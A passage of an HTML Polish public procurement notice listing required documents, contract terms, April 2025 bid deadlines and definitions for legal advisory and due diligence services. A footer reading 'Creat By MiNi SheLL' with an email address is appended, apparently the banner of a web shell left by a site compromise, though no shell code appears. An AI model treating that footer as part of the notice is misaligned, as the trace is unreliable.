środków dowodowych na potwierdzenie braku podstaw wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia. <br/>2.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu Wykonawca składa:<br/>1)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, dat wykonania<br/>i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane.<br/>Okres 5 lat, o którym mowa powyżej, liczy się wstecz od dnia, w którym upływa termin składania ofert;<br/>2)	dowody określające, czy usługi wykazane w wykazie, o którym mowa w pkt 1, zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy wraz z dokumentami potwierdzającymi brak możliwości przedłożenia dowodów; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>3)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wzory wykazów (usług i osób) zostaną przekazane wraz z wezwaniem.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca zobowiązany jest złożyć OFERTĘ na formularzu, którego wzór stanowi załącznik nr 1 do SWZ oraz wraz z ofertą poniższe dokumenty/oświadczenia:<br/>1) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy - jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z KRS, CEIDG lub innego właściwego rejestru;<br/>2) pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna);<br/>3) oświadczenia z art. 125 ust. 1 Pzp o spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia;<br/>4) oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5) oświadczenie z art. 125 ust. 1 Pzp podmiotu udostępniającego zasoby na zasadzie art. 118 ustawy Pzp potwierdzający brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu;<br/>6) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia;<br/>7) oświadczenia i/lub dokumenty, na podstawie których Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli Wykonawca składając ofertę zastrzega takie informacje) . <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może zostać spełniony przez jednego Wykonawcę lub łącznie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, po ustanowieniu pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie tego zamówienia. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia (konsorcja, spółki cywilne) ponoszą solidarną odpowiedzialność za wykonanie zamówienia, tzn. umowy odpłatnej zawartej między zamawiającym a Wykonawcą.<br/>Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy Wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do Wykonawcy o wyjaśnienia w zakresie faktycznie konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez Wykonawcę faktur. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia znajduje się w Zał. nr 2 do SWZ w szczególności w § 23 i 24 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">zakupy.arp.pl/app/login</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-07 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. cd. z SEKCJI IV - 4.3.1) Sposobu oceny ofert:<br/>Zamawiający wyjaśnia, że przez niżej wymienione wyrażenia rozumie:<br/>▪	„doradztwo prawne” rozumie się świadczenie pomocy prawnej w rozumieniu art. 2 ustawy o radcach prawnych oraz art. 1 ust. 1 ustawy Prawo o adwokaturze, obejmujące czynności związane bezpośrednio z daną transakcją, w szczególności negocjowanie i sporządzanie dokumentów transakcyjnych (np. umowy sprzedaż udziałów);<br/>▪	„proces prawny due diligence” rozumie się analizę prawną podmiotu będącego przedmiotem potencjalnej (przyszłej) transakcji, którego celem jest identyfikacja dla inwestora (nabywcy) ewentualnych ryzyk prawnych związanych z przedmiotem transakcji; obejmuje to także analizę w zakresie formy i struktury przyszłej transakcji, uwzględniając identyfikację czynności, których podjęcie będzie konieczne dla skutecznego dokonania transakcji, jak np. uzyskanie właściwych zgód;<br/>▪	„fuzja przedsiębiorstwa” rozumie się połączenie, zgodnie z art. 491 KSH, co najmniej dwóch, autonomicznych (tj. niepowiązanych ze sobą) podmiotów;<br/>▪	„przejęcie przedsiębiorstwa” rozumie się nabycie co najmniej 50 % akcji lub udziałów w spółce kapitałowej, a także sprzedaż przedsiębiorstwa lub zorganizowanej części przedsiębiorstwa;<br/>▪	„większościowy udział Skarbu Państwa”, należy przyjąć, że w danej spółce Skarb Państwa posiada ponad 50% akcji/udziałów lub można będzie uznać Skarb Państwa za akcjonariusza/udziałowca dominującego, zgodnie z art. 4 § 1 pkt 4 KHS, stosowanym odpowiednio.<br/>3.	Zamawiający uzna za najkorzystniejsze oferty, pierwsze 3 (trzy) oferty które uzyskały najwyższą liczbę punktów (P), z zastrzeżeniem zapisów ust. 4 Rozdziału III SWZ.<br/>4.	Zamawiający dokona wyliczenia punktów dla danej oferty do dwóch miejsc po przecinku (jeżeli trzecia cyfra po przecinku jest równa lub większa od 5 zaokrągli liczbę przyznanych punktów w górę, a jeżeli trzecia cyfra po przecinku jest mniejsza od 5 zaokrągli liczbę przyznanych punktów w dół) i wybierze ofertę z najwyższą liczbą punktów ogółem, spośród ofert niepodlegających odrzuceniu.<br/>5.	Kryteria wyboru najkorzystniejszej oferty w postępowaniu wykonawczym zostały opisane w projekcie umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com